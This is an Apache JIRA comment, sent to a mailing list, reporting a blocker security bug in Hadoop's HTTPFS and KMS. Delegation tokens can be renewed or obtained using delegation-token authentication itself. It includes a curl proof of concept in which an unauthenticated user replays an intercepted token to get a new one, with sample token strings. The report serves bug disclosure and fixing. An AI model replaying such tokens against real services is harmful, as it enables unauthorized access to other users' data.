[
https://issues.apache.org/jira/browse/HADOOP-13316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15347638#comment-15347638
]
Xiao Chen commented on HADOOP-13316:
------------------------------------
Example from HTTPFS:
1. Innocent user gets a token:
{noformat}
curl -i -L --negotiate -u:
"http://xiaog-1.gce.cloudera.com:14000/webhdfs/v1/?op=GETDELEGATIONTOKEN";
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
WWW-Authenticate: Negotiate
Content-Length: 0
Date: Fri, 24 Jun 2016 03:30:47 GMT
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 125
Date: Fri, 24 Jun 2016 03:30:47 GMT
{"Token":{"urlString":"IAAGaW1wYWxhBmltcGFsYQCKAVWAdb1aigFVpIJBWgECFLd6Bb7yTckDnGgC1e6FWQ0WlmirEldFQkhERlMgZGVsZWdhdGlvbgA"}}
{noformat}
2. Malicious user who used to have no auth:
{noformat}
[root@xiaog-1 ~]# curl -i -L --negotiate -u:
"http://xiaog-1.gce.cloudera.com:14000/webhdfs/v1/?op=GETDELEGATIONTOKEN";
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
WWW-Authenticate: Negotiate
Content-Length: 0
Date: Fri, 24 Jun 2016 03:36:19 GMT
{noformat}
3. Malicious user intercepts the token from innocent user, and happily gets its
own:
{noformat}
[root@xiaog-1 ~]# curl -i -L --negotiate -u:
"http://xiaog-1.gce.cloudera.com:14000/webhdfs/v1/?op=GETDELEGATIONTOKEN&delegation=IAAGaW1wYWxhBmltcGFsYQCKAVWAdb1aigFVpIJBWgECFLd6Bb7yTckDnGgC1e6FWQ0WlmirEldFQkhERlMgZGVsZWdhdGlvbgA";
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 125
Date: Fri, 24 Jun 2016 03:36:46 GMT
{"Token":{"urlString":"IAAGaW1wYWxhBmltcGFsYQCKAVWAezXcigFVpIe53AICFGoUkUqrWVq4n1aCuv3lpVihQrevEldFQkhERlMgZGVsZWdhdGlvbgA"}}
{noformat}
> Delegation Tokens should not be renewed or retrived using delegation token
> authentication
> -----------------------------------------------------------------------------------------
>
> Key: HADOOP-13316
> URL: https://issues.apache.org/jira/browse/HADOOP-13316
> Project: Hadoop Common
> Issue Type: Bug
> Components: kms, security
> Affects Versions: 2.6.0
> Reporter: Xiao Chen
> Assignee: Xiao Chen
> Priority: Blocker
>
> Delegation tokens are supposed to be exchanged in a secure authentication,
> for security concerns.
> For example, HDFS [only distribute or renew a delegation token under kerberos
> authentication|https://github.com/apache/hadoop/blob/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/namenode/FSNamesystem.java#L5164]
> {{DelegationTokenAuthenticationHandler}} used by KMS + HTTPFS doesn't follow
> this now, and poses security concerns. Details in comments.
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
